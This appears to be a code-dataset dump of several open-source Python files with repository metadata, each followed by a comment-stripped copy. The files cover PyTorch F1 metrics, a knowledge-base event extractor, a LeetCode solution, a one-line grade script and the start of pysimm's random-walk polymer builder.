ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| true | true |
f72eb3531991a856678c5e8125ca3770d94382aa | 6,355 | py | Python | UNF/training/metric.py | waterzxj/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 86 | 2020-02-23T13:38:11.000Z | 2022-03-01T12:09:28.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 2 | 2020-04-20T08:33:05.000Z | 2020-05-13T13:43:08.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 14 | 2020-03-07T05:21:44.000Z | 2021-05-09T16:57:23.000Z | #coding:utf-8
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
raise NotImplementedError
def get_metric(self, reset=False):
"""
返回metric的指标
"""
raise NotImplementedError
def reset(self):
"""
重置内部状态
"""
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
"""
把tensor安全的copy到cpu进行操作,避免gpu的oom
"""
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
"""
准确率、召回率、F值的评价指标
"""
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
# True Negatives: correct non-positive predictions.
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
# True Positives: correct positively labeled predictions.
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
# False Negatives: incorrect negatively labeled predictions.
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
# False Positives: incorrect positively labeled predictions
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
"""
返回准确率、召回率、F值评价指标
"""
# print('TP',self._true_positives,'TN',self._true_negatives,'FP',self._false_positives,'FN',self._false_negatives)
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
"""
重置内部状态
"""
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
"""
返回metric的指标
"""
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| 32.09596 | 122 | 0.59465 |
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
raise NotImplementedError
def get_metric(self, reset=False):
raise NotImplementedError
def reset(self):
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| true | true |
f72eb416f3eae037abbad9c26911354d1395878a | 235 | py | Python | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| 117.5 | 234 | 0.651064 | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| true | true |
f72eb438d3abf9cfce6d1a6d2c601b7b771936ca | 3,568 | py | Python | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
### Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file. ###
def main(argv):
opts, _ = getopt.getopt(argv,"hi:e:s:o:",["ifile=","efile=","sfile=","ofile="])
for opt, arg in opts:
if opt == '-h':
print('Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
# entity_type_to_dict_key = {'PER': 'PER_entities'} --> I didn't use this.
events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| 36.040404 | 242 | 0.633688 | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| true | true |
f72eb4628f805442a54c0a5abe345ae985fd1cad | 833 | py | Python | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-08-27T11:28:03.000Z | 2020-12-24T07:10:22.000Z | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | null | null | null | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-09-20T09:44:01.000Z | 2020-12-24T07:10:23.000Z | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.36
工具: python == 3.7.3
"""
"""
思路:
代码简单,但是关键是理解题意:
注意题目中的独有两个字:
s1 = 'ab',s2 = 'a',因为ab是s1独有,所以最长子序列为ab;
s1 = 'ab', s2 = 'ab', 因为ab是两个串都有,ab排除,a也是两个串都有,排除,b也是两个串都有,排除。所以最长特殊序列不存在,返回-1;
通过以上分析,我们可以得出结论,如果:两个串相等(不仅长度相等,内容也相等),那么他们的最长特殊序列不存在。返回-1;
如果两个串长度不一样,那么长的串 永远也不可能是 短串的子序列,即len(s1) > len(s2),则最长特殊序列为s1,返回长度大的数。
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了75%的用户
内存消耗 : 13.7 MB, 在所有 Python3 提交中击败了6.40%的用户
"""
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| 22.513514 | 87 | 0.593037 |
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| true | true |
f72eb54af7802f9a7de3342afa34f50fbf810d29 | 13,415 | py | Python | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | # ******************************************************************************
# pysimm.apps.random_walk module
# ******************************************************************************
#
# psuedo random walk algorithm written using pysimm tools
#
# ******************************************************************************
# License
# ******************************************************************************
# The MIT License (MIT)
#
# Copyright (c) 2016 Michael E. Fortunato, Coray M. Colina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
"""pysimm.apps.random_walk.find_last_backbone_vector
Finds vector between backbone atoms in terminal monomer. Requires current system s, and reference monomer m.
Args:
s: :class:`~pysimm.system.System` object
m: :class:`~pysimm.system.System` object
Returns:
list of vector components
"""
head_pos = [0, 0, 0]
tail_pos = [0, 0, 0]
for p in s.particles[-1*m.particles.count:]:
if p.linker == 'head':
head_pos = [p.x, p.y, p.z]
elif p.linker == 'tail':
tail_pos = [p.x, p.y, p.z]
return [head_pos[0] - tail_pos[0], head_pos[1] - tail_pos[1], head_pos[2] - tail_pos[2]]
def copolymer(m, nmon, s_=None, **kwargs):
"""pysimm.apps.random_walk.copolymer
Builds copolymer using random walk methodology using pattern
Args:
m: list of reference monomer :class:`~pysimm.system.System`s
nmon: total number of monomers to add to chain
s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
settings: dictionary of simulation settings
density: density at which to build polymer (0.3)
forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
capped: True/False if monomers are capped
unwrap: True to unwrap final system
traj: True to build xyz trajectory of polymer growth (True)
pattern: list of pattern for monomer repeat units, should match length of m ([1 for _ in range(len(m))])
limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
Returns:
new copolymer :class:`~pysimm.system.System`
"""
m = [x.copy() for x in m]
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
for m_ in m:
m_.add_particle_bonding()
for p in m_.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m_.remove_linker_types()
if s_ is None:
s = system.replicate(m[0], 1, density=density/nmon)
else:
s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
for p in s.particles:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
for m_ in m:
if capped:
m_.particles.remove(1)
m_.remove_spare_bonding()
m_.add_particle_bonding()
s.add_particle_bonding()
if traj:
s.write_xyz('random_walk.xyz')
temp_nmon = 1
while True:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
if temp_nmon == 1 and p_ == 1:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
elif temp_nmon == 1:
p_ -= 1
for insert in range(p_):
head = None
tail = None
backbone_vector = np.array([last_head.x - last_tail.x,
last_head.y - last_tail.y,
last_head.z - last_tail.z])
ref_head = None
ref_tail = None
for p in m_.particles:
if p.linker == 'head':
ref_head = p
elif p.linker == 'tail':
ref_tail = p
if ref_head and ref_tail:
ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
ref_head.y - ref_tail.y,
ref_head.z - ref_tail.z])
rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
translation_vector = [last_tail.x - ref_tail.x,
last_tail.y - ref_tail.y,
last_tail.z - ref_tail.z]
for p in m_.particles:
p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
else:
print('reference molecule has no head or tail')
n = m_.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
s.add(n, change_dim=False)
s.add_particle_bonding()
head = last_head
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
s.make_new_bonds(head, tail, f)
temp_nmon += 1
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
if unwrap:
s.unwrap()
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (temp_nmon)
sim.run(np=settings.get('np'))
if unwrap:
s.unwrap()
if unwrap:
s.wrap()
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
if temp_nmon >= nmon:
break
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
def random_walk(m, nmon, s_=None, **kwargs):
"""pysimm.apps.random_walk.random_walk
Builds homopolymer using random walk methodology
Args:
m: reference monomer :class:`~pysimm.system.System`
nmon: total number of monomers to add to chain
s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
extra_bonds: EXPERMINTAL, True if making ladder backbone polymer
settings: dictionary of simulation settings
density: density at which to build polymer (0.3)
forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
capped: True/False if monomers are capped
unwrap: True to unwrap final system
traj: True to build xyz trajectory of polymer growth (True)
limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
Returns:
new polymer :class:`~pysimm.system.System`
"""
m = m.copy()
extra_bonds = kwargs.get('extra_bonds', False)
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
m.add_particle_bonding()
for p in m.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m.remove_linker_types()
if s_ is None:
s = system.replicate(m, 1, density=density/nmon)
else:
s = system.replicate(m, 1, s_=s_, density=None)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
if traj:
s.write_xyz('random_walk.xyz')
if capped:
m.particles.remove(1)
m.remove_spare_bonding()
m.add_particle_bonding()
for insertion in range(nmon - 1):
head = None
tail = None
backbone_vector = np.array(find_last_backbone_vector(s, m))
for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
p_.x = p.x + 3*backbone_vector[0]
p_.y = p.y + 3*backbone_vector[1]
p_.z = p.z + 3*backbone_vector[2]
n = m.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
if extra_bonds:
heads = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
heads.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
head = p
s.add(n, change_dim=False)
s.add_particle_bonding()
if extra_bonds:
tails = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tails.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
for p in s.particles:
if not p.bonded_to:
print(p.tag)
if head and tail:
s.make_new_bonds(head, tail, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
elif extra_bonds and len(heads) == len(tails):
for h, t in izip(heads, tails):
s.make_new_bonds(h, t, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
else:
print('cannot find head and tail')
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (insertion+2)
sim.run(np=settings.get('np'))
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
| 34.309463 | 112 | 0.547372 |
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
head_pos = [0, 0, 0]
tail_pos = [0, 0, 0]
for p in s.particles[-1*m.particles.count:]:
if p.linker == 'head':
head_pos = [p.x, p.y, p.z]
elif p.linker == 'tail':
tail_pos = [p.x, p.y, p.z]
return [head_pos[0] - tail_pos[0], head_pos[1] - tail_pos[1], head_pos[2] - tail_pos[2]]
def copolymer(m, nmon, s_=None, **kwargs):
m = [x.copy() for x in m]
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
